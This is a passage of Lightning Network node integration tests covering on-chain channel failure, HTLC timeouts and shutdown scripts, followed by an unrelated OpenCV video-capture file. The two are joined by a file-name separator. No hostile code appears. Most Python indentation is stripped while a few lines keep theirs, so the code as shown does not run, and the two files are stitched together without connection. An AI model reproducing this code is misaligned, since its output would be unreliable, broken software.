l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
# Wait for timeout.
l1.daemon.wait_for_log('Propose handling THEIR_UNILATERAL/OUR_HTLC by IGNORING_TINY_PAYMENT .* after 6 blocks')
bitcoind.generate_block(5)
l1.wait_for_onchaind_broadcast('IGNORING_TINY_PAYMENT',
'THEIR_UNILATERAL/OUR_HTLC')
l1.daemon.wait_for_log('Ignoring output 0 of .*: THEIR_UNILATERAL/OUR_HTLC')
# 100 deep and l2 forgets.
bitcoind.generate_block(93)
sync_blockheight(bitcoind, [l1, l2])
assert not l2.daemon.is_in_log('onchaind complete, forgetting peer')
assert not l1.daemon.is_in_log('onchaind complete, forgetting peer')
bitcoind.generate_block(1)
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
# l1 does not wait for ignored payment.
l1.daemon.wait_for_log('onchaind complete, forgetting peer')
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1 for dev_fail")
def test_onchain_different_fees(node_factory, bitcoind, executor):
"""Onchain handling when we've had a range of fees"""
l1, l2 = node_factory.line_graph(2, fundchannel=True, fundamount=10**7,
opts={'may_reconnect': True})
l2.rpc.dev_ignore_htlcs(id=l1.info['id'], ignore=True)
p1 = executor.submit(l1.pay, l2, 1000000000)
l1.daemon.wait_for_log('htlc 0: RCVD_ADD_ACK_COMMIT->SENT_ADD_ACK_REVOCATION')
l1.set_feerates((16000, 7500, 3750))
p2 = executor.submit(l1.pay, l2, 900000000)
l1.daemon.wait_for_log('htlc 1: RCVD_ADD_ACK_COMMIT->SENT_ADD_ACK_REVOCATION')
# Restart with different feerate for second HTLC.
l1.set_feerates((5000, 5000, 3750))
l1.restart()
l1.daemon.wait_for_log('peer_out WIRE_UPDATE_FEE')
p3 = executor.submit(l1.pay, l2, 800000000)
l1.daemon.wait_for_log('htlc 2: RCVD_ADD_ACK_COMMIT->SENT_ADD_ACK_REVOCATION')
# Drop to chain
l1.rpc.dev_fail(l2.info['id'])
l1.wait_for_channel_onchain(l2.info['id'])
bitcoind.generate_block(1)
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
# Both sides should have correct feerate
assert l1.db_query('SELECT min_possible_feerate, max_possible_feerate FROM channels;') == [{
'min_possible_feerate': 5000,
'max_possible_feerate': 16000
}]
assert l2.db_query('SELECT min_possible_feerate, max_possible_feerate FROM channels;') == [{
'min_possible_feerate': 5000,
'max_possible_feerate': 16000
}]
bitcoind.generate_block(5)
# Three HTLCs, and one for the to-us output.
l1.daemon.wait_for_logs(['sendrawtx exit 0'] * 4)
# We use 3 blocks for "reasonable depth"
bitcoind.generate_block(3)
with pytest.raises(Exception):
p1.result(10)
with pytest.raises(Exception):
p2.result(10)
with pytest.raises(Exception):
p3.result(10)
# Two more for HTLC timeout tx to be spent.
bitcoind.generate_block(2)
l1.daemon.wait_for_logs(['sendrawtx exit 0'] * 3)
# Now, 100 blocks it should be done.
bitcoind.generate_block(100)
wait_for(lambda: l1.rpc.listpeers()['peers'] == [])
wait_for(lambda: l2.rpc.listpeers()['peers'] == [])
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_permfail_new_commit(node_factory, bitcoind, executor):
# Test case where we have two possible commits: it will use new one.
disconnects = ['-WIRE_REVOKE_AND_ACK', 'permfail']
# Feerates identical so we don't get gratuitous commit to update them
l1 = node_factory.get_node(options={'dev-no-reconnect': None}, feerates=(7500, 7500, 7500))
l2 = node_factory.get_node(disconnect=disconnects)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fund_channel(l2, 10**6)
# This will fail at l2's end.
t = executor.submit(l1.pay, l2, 200000000)
l2.daemon.wait_for_log('dev_disconnect permfail')
l2.wait_for_channel_onchain(l1.info['id'])
bitcoind.generate_block(1)
l1.daemon.wait_for_log('Their unilateral tx, new commit point')
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log('Propose handling OUR_UNILATERAL/THEIR_HTLC by THEIR_HTLC_TIMEOUT_TO_THEM \\(IGNORING\\) after 6 blocks')
l1.daemon.wait_for_log('Propose handling THEIR_UNILATERAL/OUR_HTLC by OUR_HTLC_TIMEOUT_TO_US (.*) after 6 blocks')
# OK, time out HTLC.
bitcoind.generate_block(5)
l1.wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
'THEIR_UNILATERAL/OUR_HTLC')
bitcoind.generate_block(1)
l1.daemon.wait_for_log('Resolved THEIR_UNILATERAL/OUR_HTLC by our proposal OUR_HTLC_TIMEOUT_TO_US')
l2.daemon.wait_for_log('Ignoring output.*: OUR_UNILATERAL/THEIR_HTLC')
t.cancel()
# Now, 100 blocks it should be done.
bitcoind.generate_block(100)
wait_for(lambda: l1.rpc.listpeers()['peers'] == [])
wait_for(lambda: l2.rpc.listpeers()['peers'] == [])
def setup_multihtlc_test(node_factory, bitcoind):
# l1 -> l2 -> l3 -> l4 -> l5 -> l6 -> l7
    # l1 and l7 ignore any HTLCs they're sent.
# For each direction, we create these HTLCs with same payment_hash:
# 1 failed (CLTV1)
# 1 failed (CLTV2)
# 2 live (CLTV2)
# 1 live (CLTV3)
nodes = node_factory.line_graph(7, wait_for_announce=True,
opts={'dev-no-reconnect': None,
'may_reconnect': True})
# Balance by pushing half the funds.
b11 = nodes[-1].rpc.invoice(10**9 // 2, '1', 'balancer')['bolt11']
nodes[0].rpc.pay(b11)
nodes[0].rpc.dev_ignore_htlcs(id=nodes[1].info['id'], ignore=True)
nodes[-1].rpc.dev_ignore_htlcs(id=nodes[-2].info['id'], ignore=True)
preimage = "0" * 64
h = nodes[0].rpc.invoice(msatoshi=10**8, label='x', description='desc',
preimage=preimage)['payment_hash']
nodes[-1].rpc.invoice(msatoshi=10**8, label='x', description='desc',
preimage=preimage)['payment_hash']
# First, the failed attempts (paying wrong node). CLTV1
r = nodes[0].rpc.getroute(nodes[-2].info['id'], 10**8, 1)["route"]
nodes[0].rpc.sendpay(r, h)
with pytest.raises(RpcError, match=r'INCORRECT_OR_UNKNOWN_PAYMENT_DETAILS'):
nodes[0].rpc.waitsendpay(h)
r = nodes[-1].rpc.getroute(nodes[1].info['id'], 10**8, 1)["route"]
nodes[-1].rpc.sendpay(r, h)
with pytest.raises(RpcError, match=r'INCORRECT_OR_UNKNOWN_PAYMENT_DETAILS'):
nodes[-1].rpc.waitsendpay(h)
# Now increment CLTV -> CLTV2
bitcoind.generate_block(1)
sync_blockheight(bitcoind, nodes)
# Now, the live attempts with CLTV2 (blackholed by end nodes)
r = nodes[0].rpc.getroute(nodes[-1].info['id'], 10**8, 1)["route"]
nodes[0].rpc.sendpay(r, h)
r = nodes[-1].rpc.getroute(nodes[0].info['id'], 10**8, 1)["route"]
nodes[-1].rpc.sendpay(r, h)
    # We send the second HTLC from a different node, since a node refuses to
    # send multiple HTLCs with the same hash.
r = nodes[1].rpc.getroute(nodes[-1].info['id'], 10**8, 1)["route"]
nodes[1].rpc.sendpay(r, h)
r = nodes[-2].rpc.getroute(nodes[0].info['id'], 10**8, 1)["route"]
nodes[-2].rpc.sendpay(r, h)
# Now increment CLTV -> CLTV3.
bitcoind.generate_block(1)
sync_blockheight(bitcoind, nodes)
r = nodes[2].rpc.getroute(nodes[-1].info['id'], 10**8, 1)["route"]
nodes[2].rpc.sendpay(r, h)
r = nodes[-3].rpc.getroute(nodes[0].info['id'], 10**8, 1)["route"]
nodes[-3].rpc.sendpay(r, h)
# Make sure HTLCs have reached the end.
nodes[0].daemon.wait_for_logs(['peer_in WIRE_UPDATE_ADD_HTLC'] * 3)
nodes[-1].daemon.wait_for_logs(['peer_in WIRE_UPDATE_ADD_HTLC'] * 3)
return h, nodes
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1 for dev_ignore_htlcs")
@unittest.skipIf(SLOW_MACHINE and VALGRIND, "slow test")
def test_onchain_multihtlc_our_unilateral(node_factory, bitcoind):
"""Node pushes a channel onchain with multiple HTLCs with same payment_hash """
h, nodes = setup_multihtlc_test(node_factory, bitcoind)
mid = len(nodes) // 2
for i in range(len(nodes) - 1):
assert only_one(nodes[i].rpc.listpeers(nodes[i + 1].info['id'])['peers'])['connected']
    # Now midnode goes onchain with its channel to midnode+1.
nodes[mid].rpc.dev_fail(nodes[mid + 1].info['id'])
nodes[mid].wait_for_channel_onchain(nodes[mid + 1].info['id'])
bitcoind.generate_block(1)
nodes[mid].daemon.wait_for_log(' to ONCHAIN')
nodes[mid + 1].daemon.wait_for_log(' to ONCHAIN')
# Now, restart and manually reconnect end nodes (so they don't ignore HTLCs)
# In fact, they'll fail them with WIRE_TEMPORARY_NODE_FAILURE.
# TODO Remove our reliance on HTLCs failing on startup and the need for
# this plugin
nodes[0].daemon.opts['plugin'] = os.path.join(os.getcwd(), 'tests/plugins/fail_htlcs.py')
nodes[-1].daemon.opts['plugin'] = os.path.join(os.getcwd(), 'tests/plugins/fail_htlcs.py')
nodes[0].restart()
nodes[-1].restart()
# We disabled auto-reconnect so we'd detect breakage, so manually reconnect.
nodes[0].rpc.connect(nodes[1].info['id'], 'localhost', nodes[1].port)
nodes[-1].rpc.connect(nodes[-2].info['id'], 'localhost', nodes[-2].port)
# Wait for HTLCs to stabilize.
nodes[0].daemon.wait_for_logs(['peer_out WIRE_UPDATE_FAIL_HTLC'] * 3)
nodes[0].daemon.wait_for_log('peer_out WIRE_COMMITMENT_SIGNED')
nodes[0].daemon.wait_for_log('peer_out WIRE_REVOKE_AND_ACK')
nodes[-1].daemon.wait_for_logs(['peer_out WIRE_UPDATE_FAIL_HTLC'] * 3)
nodes[-1].daemon.wait_for_log('peer_out WIRE_COMMITMENT_SIGNED')
nodes[-1].daemon.wait_for_log('peer_out WIRE_REVOKE_AND_ACK')
    # At depth 5, midnode will spend its own to-self output.
bitcoind.generate_block(4)
nodes[mid].wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
# The three outgoing HTLCs time out at 21, 21 and 22 blocks.
bitcoind.generate_block(16)
nodes[mid].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TX',
'OUR_UNILATERAL/OUR_HTLC')
nodes[mid].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TX',
'OUR_UNILATERAL/OUR_HTLC')
bitcoind.generate_block(1)
nodes[mid].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TX',
'OUR_UNILATERAL/OUR_HTLC')
# And three more for us to consider them all settled.
bitcoind.generate_block(3)
# Now, those nodes should have correctly failed the HTLCs
for n in nodes[:mid - 1]:
with pytest.raises(RpcError, match=r'WIRE_PERMANENT_CHANNEL_FAILURE'):
n.rpc.waitsendpay(h, TIMEOUT)
# Other timeouts are 27,27,28 blocks.
bitcoind.generate_block(2)
nodes[mid].daemon.wait_for_logs(['Ignoring output.*: OUR_UNILATERAL/THEIR_HTLC'] * 2)
for _ in range(2):
nodes[mid + 1].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
'THEIR_UNILATERAL/OUR_HTLC')
bitcoind.generate_block(1)
nodes[mid].daemon.wait_for_log('Ignoring output.*: OUR_UNILATERAL/THEIR_HTLC')
nodes[mid + 1].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
'THEIR_UNILATERAL/OUR_HTLC')
# Depth 3 to consider it settled.
bitcoind.generate_block(3)
for n in nodes[mid + 1:]:
with pytest.raises(RpcError, match=r'WIRE_PERMANENT_CHANNEL_FAILURE'):
n.rpc.waitsendpay(h, TIMEOUT)
# At depth 100 it's all done (we didn't bother waiting for mid+1's
# spends, so that might still be going)
bitcoind.generate_block(97)
nodes[mid].daemon.wait_for_logs(['onchaind complete, forgetting peer'])
# No other channels should have failed.
for i in range(len(nodes) - 1):
if i != mid:
assert only_one(nodes[i].rpc.listpeers(nodes[i + 1].info['id'])['peers'])['connected']
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1 for dev_ignore_htlcs")
@unittest.skipIf(SLOW_MACHINE and VALGRIND, "slow test")
def test_onchain_multihtlc_their_unilateral(node_factory, bitcoind):
"""Node pushes a channel onchain with multiple HTLCs with same payment_hash """
h, nodes = setup_multihtlc_test(node_factory, bitcoind)
mid = len(nodes) // 2
for i in range(len(nodes) - 1):
assert only_one(nodes[i].rpc.listpeers(nodes[i + 1].info['id'])['peers'])['connected']
    # Now midnode+1 goes onchain with its channel to midnode.
nodes[mid + 1].rpc.dev_fail(nodes[mid].info['id'])
nodes[mid + 1].wait_for_channel_onchain(nodes[mid].info['id'])
bitcoind.generate_block(1)
nodes[mid].daemon.wait_for_log(' to ONCHAIN')
nodes[mid + 1].daemon.wait_for_log(' to ONCHAIN')
# Now, restart and manually reconnect end nodes (so they don't ignore HTLCs)
# In fact, they'll fail them with WIRE_TEMPORARY_NODE_FAILURE.
# TODO Remove our reliance on HTLCs failing on startup and the need for
# this plugin
nodes[0].daemon.opts['plugin'] = os.path.join(os.getcwd(), 'tests/plugins/fail_htlcs.py')
nodes[-1].daemon.opts['plugin'] = os.path.join(os.getcwd(), 'tests/plugins/fail_htlcs.py')
nodes[0].restart()
nodes[-1].restart()
# We disabled auto-reconnect so we'd detect breakage, so manually reconnect.
nodes[0].rpc.connect(nodes[1].info['id'], 'localhost', nodes[1].port)
nodes[-1].rpc.connect(nodes[-2].info['id'], 'localhost', nodes[-2].port)
# Wait for HTLCs to stabilize.
nodes[0].daemon.wait_for_logs(['peer_out WIRE_UPDATE_FAIL_HTLC'] * 3)
nodes[0].daemon.wait_for_log('peer_out WIRE_COMMITMENT_SIGNED')
nodes[0].daemon.wait_for_log('peer_out WIRE_REVOKE_AND_ACK')
nodes[-1].daemon.wait_for_logs(['peer_out WIRE_UPDATE_FAIL_HTLC'] * 3)
nodes[-1].daemon.wait_for_log('peer_out WIRE_COMMITMENT_SIGNED')
nodes[-1].daemon.wait_for_log('peer_out WIRE_REVOKE_AND_ACK')
# At depth 5, midnode+1 will spend its own to-self output.
bitcoind.generate_block(4)
    nodes[mid + 1].wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
                                               'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
# The three outgoing HTLCs time out at depth 21, 21 and 22 blocks.
bitcoind.generate_block(16)
nodes[mid].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
'THEIR_UNILATERAL/OUR_HTLC')
nodes[mid].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
'THEIR_UNILATERAL/OUR_HTLC')
bitcoind.generate_block(1)
nodes[mid].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TO_US',
'THEIR_UNILATERAL/OUR_HTLC')
# At depth 3 we consider them all settled.
bitcoind.generate_block(3)
# Now, those nodes should have correctly failed the HTLCs
for n in nodes[:mid - 1]:
with pytest.raises(RpcError, match=r'WIRE_PERMANENT_CHANNEL_FAILURE'):
n.rpc.waitsendpay(h, TIMEOUT)
# Other timeouts are at depths 27,27,28 blocks.
bitcoind.generate_block(2)
nodes[mid].daemon.wait_for_logs(['Ignoring output.*: THEIR_UNILATERAL/THEIR_HTLC'] * 2)
for _ in range(2):
nodes[mid + 1].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TX',
'OUR_UNILATERAL/OUR_HTLC')
bitcoind.generate_block(1)
nodes[mid].daemon.wait_for_log('Ignoring output.*: THEIR_UNILATERAL/THEIR_HTLC')
nodes[mid + 1].wait_for_onchaind_broadcast('OUR_HTLC_TIMEOUT_TX',
'OUR_UNILATERAL/OUR_HTLC')
# At depth 3 we consider them all settled.
bitcoind.generate_block(3)
for n in nodes[mid + 1:]:
with pytest.raises(RpcError, match=r'WIRE_PERMANENT_CHANNEL_FAILURE'):
n.rpc.waitsendpay(h, TIMEOUT)
# At depth 5, mid+1 can spend HTLC_TIMEOUT_TX output.
bitcoind.generate_block(1)
for _ in range(2):
nodes[mid + 1].wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_HTLC_TIMEOUT_TX/DELAYED_OUTPUT_TO_US')
bitcoind.generate_block(1)
nodes[mid + 1].wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_HTLC_TIMEOUT_TX/DELAYED_OUTPUT_TO_US')
# At depth 100 they're all done.
bitcoind.generate_block(100)
nodes[mid].daemon.wait_for_logs(['onchaind complete, forgetting peer'])
nodes[mid + 1].daemon.wait_for_logs(['onchaind complete, forgetting peer'])
# No other channels should have failed.
for i in range(len(nodes) - 1):
if i != mid:
assert only_one(nodes[i].rpc.listpeers(nodes[i + 1].info['id'])['peers'])['connected']
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_permfail_htlc_in(node_factory, bitcoind, executor):
# Test case where we fail with unsettled incoming HTLC.
disconnects = ['-WIRE_UPDATE_FULFILL_HTLC', 'permfail']
# Feerates identical so we don't get gratuitous commit to update them
l1 = node_factory.get_node(options={'dev-no-reconnect': None}, feerates=(7500, 7500, 7500))
l2 = node_factory.get_node(disconnect=disconnects)
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fund_channel(l2, 10**6)
# This will fail at l2's end.
t = executor.submit(l1.pay, l2, 200000000)
l2.daemon.wait_for_log('dev_disconnect permfail')
l2.wait_for_channel_onchain(l1.info['id'])
bitcoind.generate_block(1)
l1.daemon.wait_for_log('Their unilateral tx, old commit point')
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log('Propose handling OUR_UNILATERAL/THEIR_HTLC by THEIR_HTLC_TIMEOUT_TO_THEM \\(IGNORING\\) after 6 blocks')
l1.daemon.wait_for_log('Propose handling THEIR_UNILATERAL/OUR_HTLC by OUR_HTLC_TIMEOUT_TO_US (.*) after 6 blocks')
# l2 then gets preimage, uses it instead of ignoring
l2.wait_for_onchaind_broadcast('OUR_HTLC_SUCCESS_TX',
'OUR_UNILATERAL/THEIR_HTLC')
bitcoind.generate_block(1)
# OK, l1 sees l2 fulfill htlc.
l1.daemon.wait_for_log('THEIR_UNILATERAL/OUR_HTLC gave us preimage')
l2.daemon.wait_for_log('Propose handling OUR_HTLC_SUCCESS_TX/DELAYED_OUTPUT_TO_US by OUR_DELAYED_RETURN_TO_WALLET .* after 5 blocks')
bitcoind.generate_block(5)
l2.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_HTLC_SUCCESS_TX/DELAYED_OUTPUT_TO_US')
t.cancel()
# Now, 100 blocks it should be done.
bitcoind.generate_block(95)
l1.daemon.wait_for_log('onchaind complete, forgetting peer')
assert not l2.daemon.is_in_log('onchaind complete, forgetting peer')
bitcoind.generate_block(5)
l2.daemon.wait_for_log('onchaind complete, forgetting peer')
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_permfail_htlc_out(node_factory, bitcoind, executor):
# Test case where we fail with unsettled outgoing HTLC.
disconnects = ['+WIRE_REVOKE_AND_ACK', 'permfail']
l1 = node_factory.get_node(options={'dev-no-reconnect': None})
# Feerates identical so we don't get gratuitous commit to update them
l2 = node_factory.get_node(disconnect=disconnects, feerates=(7500, 7500, 7500))
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
    l2.daemon.wait_for_log('openingd-chan#1: Handed peer, entering loop')
l2.fund_channel(l1, 10**6)
# This will fail at l2's end.
t = executor.submit(l2.pay, l1, 200000000)
l2.daemon.wait_for_log('dev_disconnect permfail')
l2.wait_for_channel_onchain(l1.info['id'])
bitcoind.generate_block(1)
l1.daemon.wait_for_log('Their unilateral tx, old commit point')
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_logs([
'Propose handling OUR_UNILATERAL/OUR_HTLC by OUR_HTLC_TIMEOUT_TX \\(.*\\) after 6 blocks',
'Propose handling OUR_UNILATERAL/DELAYED_OUTPUT_TO_US by OUR_DELAYED_RETURN_TO_WALLET .* after 5 blocks'
])
l1.daemon.wait_for_log('Propose handling THEIR_UNILATERAL/THEIR_HTLC by THEIR_HTLC_TIMEOUT_TO_THEM \\(IGNORING\\) after 6 blocks')
# l1 then gets preimage, uses it instead of ignoring
l1.wait_for_onchaind_broadcast('THEIR_HTLC_FULFILL_TO_US',
'THEIR_UNILATERAL/THEIR_HTLC')
# l2 sees l1 fulfill tx.
bitcoind.generate_block(1)
l2.daemon.wait_for_log('OUR_UNILATERAL/OUR_HTLC gave us preimage')
t.cancel()
# l2 can send OUR_DELAYED_RETURN_TO_WALLET after 3 more blocks.
bitcoind.generate_block(3)
l2.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
# Now, 100 blocks they should be done.
bitcoind.generate_block(95)
sync_blockheight(bitcoind, [l1, l2])
assert not l1.daemon.is_in_log('onchaind complete, forgetting peer')
assert not l2.daemon.is_in_log('onchaind complete, forgetting peer')
bitcoind.generate_block(1)
l1.daemon.wait_for_log('onchaind complete, forgetting peer')
sync_blockheight(bitcoind, [l2])
assert not l2.daemon.is_in_log('onchaind complete, forgetting peer')
bitcoind.generate_block(3)
sync_blockheight(bitcoind, [l2])
assert not l2.daemon.is_in_log('onchaind complete, forgetting peer')
bitcoind.generate_block(1)
wait_for(lambda: l2.rpc.listpeers()['peers'] == [])
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_permfail(node_factory, bitcoind):
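    # A unilateral close forced via dev_fail: l1 watches l2's unilateral tx,
    # both nodes resolve their outputs on-chain and eventually forget the peer.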
l1, l2 = node_factory.line_graph(2)
# The funding change should be confirmed and our only output
assert [o['status'] for o in l1.rpc.listfunds()['outputs']] == ['confirmed']
l1.pay(l2, 200000000)
# Make sure l2 has received sig with 0 htlcs!
l2.daemon.wait_for_log('Received commit_sig with 1 htlc sigs')
l2.daemon.wait_for_log('Received commit_sig with 0 htlc sigs')
# Make sure l1 has final revocation.
l1.daemon.wait_for_log('Sending commit_sig with 1 htlc sigs')
l1.daemon.wait_for_log('Sending commit_sig with 0 htlc sigs')
l1.daemon.wait_for_log('peer_in WIRE_REVOKE_AND_ACK')
# We fail l2, so l1 will reconnect to it.
l2.rpc.dev_fail(l1.info['id'])
l2.daemon.wait_for_log('Failing due to dev-fail command')
l2.wait_for_channel_onchain(l1.info['id'])
assert l1.bitcoin.rpc.getmempoolinfo()['size'] == 1
# Now grab the close transaction
closetxid = only_one(l1.bitcoin.rpc.getrawmempool(False))
# l2 will send out tx (l1 considers it a transient error)
bitcoind.generate_block(1)
l1.daemon.wait_for_log('Their unilateral tx, old commit point')
l1.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log(' to ONCHAIN')
l2.daemon.wait_for_log('Propose handling OUR_UNILATERAL/DELAYED_OUTPUT_TO_US by OUR_DELAYED_RETURN_TO_WALLET (.*) after 5 blocks')
wait_for(lambda: only_one(l1.rpc.listpeers(l2.info['id'])['peers'][0]['channels'])['status']
== ['ONCHAIN:Tracking their unilateral close',
'ONCHAIN:All outputs resolved: waiting 99 more blocks before forgetting channel'])
def check_billboard():
billboard = only_one(l2.rpc.listpeers(l1.info['id'])['peers'][0]['channels'])['status']
return (
len(billboard) == 2
and billboard[0] == 'ONCHAIN:Tracking our own unilateral close'
and re.fullmatch(r'ONCHAIN:.* outputs unresolved: in 4 blocks will spend DELAYED_OUTPUT_TO_US \(.*:0\) using OUR_DELAYED_RETURN_TO_WALLET', billboard[1])
)
wait_for(check_billboard)
# Now, mine 4 blocks so it sends out the spending tx.
bitcoind.generate_block(4)
# onchaind notes to-local payment immediately.
assert (closetxid, "confirmed") in set([(o['txid'], o['status']) for o in l1.rpc.listfunds()['outputs']])
# Restart, should still be confirmed (fails: unwinding blocks erases
# the confirmation, and we don't re-make it).
l1.restart()
wait_for(lambda: (closetxid, "confirmed") in set([(o['txid'], o['status']) for o in l1.rpc.listfunds()['outputs']]))
# It should send the to-wallet tx.
l2.wait_for_onchaind_broadcast('OUR_DELAYED_RETURN_TO_WALLET',
'OUR_UNILATERAL/DELAYED_OUTPUT_TO_US')
# 100 after l1 sees tx, it should be done.
bitcoind.generate_block(95)
wait_for(lambda: l1.rpc.listpeers()['peers'] == [])
wait_for(lambda: only_one(l2.rpc.listpeers(l1.info['id'])['peers'][0]['channels'])['status'] == [
'ONCHAIN:Tracking our own unilateral close',
'ONCHAIN:All outputs resolved: waiting 5 more blocks before forgetting channel'
])
# Now, 100 blocks l2 should be done.
bitcoind.generate_block(5)
wait_for(lambda: l2.rpc.listpeers()['peers'] == [])
# Only l1 has a direct output since all of l2's outputs are respent (it
# failed). Also the output should now be listed as confirmed since we
# generated some more blocks.
assert (closetxid, "confirmed") in set([(o['txid'], o['status']) for o in l1.rpc.listfunds()['outputs']])
    # Check that all the addresses match what we generated ourselves:
for o in l1.rpc.listfunds()['outputs']:
txout = bitcoind.rpc.gettxout(o['txid'], o['output'])
addr = txout['scriptPubKey']['addresses'][0]
assert(addr == o['address'])
addr = l1.bitcoin.getnewaddress()
l1.rpc.withdraw(addr, "all")
@unittest.skipIf(not DEVELOPER, "needs DEVELOPER=1")
def test_shutdown(node_factory):
# Fail, in that it will exit before cleanup.
l1 = node_factory.get_node(may_fail=True)
if not VALGRIND:
leaks = l1.rpc.dev_memleak()['leaks']
if len(leaks):
raise Exception("Node {} has memory leaks: {}"
.format(l1.daemon.lightning_dir, leaks))
l1.rpc.stop()
@flaky
@unittest.skipIf(not DEVELOPER, "needs to set upfront_shutdown_script")
def test_option_upfront_shutdown_script(node_factory, bitcoind, executor):
l1 = node_factory.get_node(start=False)
# Insist on upfront script we're not going to match.
l1.daemon.env["DEV_OPENINGD_UPFRONT_SHUTDOWN_SCRIPT"] = "76a91404b61f7dc1ea0dc99424464cc4064dc564d91e8988ac"
l1.start()
l2 = node_factory.get_node()
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fund_channel(l2, 1000000, False)
    # This will block, as l2 will send an error but l1 will retry.
fut = executor.submit(l1.rpc.close, l2.info['id'])
# l2 will close unilaterally when it dislikes shutdown script.
l1.daemon.wait_for_log(r'scriptpubkey .* is not as agreed upfront \(76a91404b61f7dc1ea0dc99424464cc4064dc564d91e8988ac\)')
# Clear channel.
wait_for(lambda: len(bitcoind.rpc.getrawmempool()) != 0)
bitcoind.generate_block(1)
fut.result(TIMEOUT)
wait_for(lambda: [c['state'] for c in only_one(l1.rpc.listpeers()['peers'])['channels']] == ['ONCHAIN'])
wait_for(lambda: [c['state'] for c in only_one(l2.rpc.listpeers()['peers'])['channels']] == ['ONCHAIN'])
# Works when l2 closes channel, too.
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.fund_channel(l2, 1000000, False)
l2.rpc.close(l1.info['id'])
# l2 will close unilaterally when it dislikes shutdown script.
l1.daemon.wait_for_log(r'scriptpubkey .* is not as agreed upfront \(76a91404b61f7dc1ea0dc99424464cc4064dc564d91e8988ac\)')
# Clear channel.
wait_for(lambda: len(bitcoind.rpc.getrawmempool()) != 0)
bitcoind.generate_block(1)
wait_for(lambda: [c['state'] for c in only_one(l1.rpc.listpeers()['peers'])['channels']] == ['ONCHAIN', 'ONCHAIN'])
wait_for(lambda: [c['state'] for c in only_one(l2.rpc.listpeers()['peers'])['channels']] == ['ONCHAIN', 'ONCHAIN'])
# Figure out what address it will try to use.
keyidx = int(l1.db_query("SELECT intval FROM vars WHERE name='bip32_max_index';")[0]['intval'])
# Expect 1 for change address, 1 for the channel final address,
# which are discarded as the 'scratch' tx that the fundchannel
# plugin makes, plus 1 for the funding address of the actual
# funding tx.
addr = l1.rpc.call('dev-listaddrs', [keyidx + 3])['addresses'][-1]
# Now, if we specify upfront and it's OK, all good.
l1.stop()
# We need to prepend the segwit version (0) and push opcode (14).
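    # (0x00 is the segwit v0 marker and 0x14 pushes the next 20 bytes, so this
    # prefix plus the 20-byte key hash forms a standard P2WPKH scriptpubkey.)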
l1.daemon.env["DEV_OPENINGD_UPFRONT_SHUTDOWN_SCRIPT"] = '0014' + addr['bech32_redeemscript']
l1.start()
l1.rpc.connect(l2.info['id'], 'localhost', l2.port)
l1.rpc.fundchannel(l2.info['id'], 1000000)
l1.rpc.close(l2.info['id'])
wait_for(lambda: sorted([c['state'] for c in only_one(l1.rpc.listpeers()['peers'])['channels']]) == ['CLOSINGD_COMPLETE', 'ONCHAIN', 'ONCHAIN'])
|
live_detection.py
|
import cv2
import time
import queue
import threading
from detector_lowres import Detector
class VideoCapture:
"""
bufferless VideoCapture
"""
def __init__(self, name, width=1920, height=1080):
self.cap = cv2.VideoCapture(name)
if not self.cap.isOpened():
print("Cannot open camera")
return
width_set = self.cap.set(cv2.CAP_PROP_FRAME_WIDTH, float(width))
height_set = self.cap.set(cv2.CAP_PROP_FRAME_HEIGHT, float(height))
if not (width_set and height_set):
print("Set resolution failed")
print("Resolution: {}x{}".format(self.cap.get(cv2.CAP_PROP_FRAME_WIDTH),
self.cap.get(cv2.CAP_PROP_FRAME_HEIGHT)))
self.q = queue.Queue()
self._stop = False
self.t = threading.Thread(target=self._reader)
self.t.daemon = True
self.t.start()
# read frames as soon as they are available, keeping only most recent one
def _reader(self):
while not self._stop:
ret, img = self.cap.read()
if not ret:
break
if not self.q.empty():
try:
self.q.get_nowait() # discard previous (unprocessed) frame
except queue.Empty:
pass
self.q.put(img)
def read(self):
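        # Blocks until the reader thread supplies a frame; anything not
        # consumed in time has already been discarded, so this is always the
        # most recent frame.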
return self.q.get()
def close(self):
self._stop = True
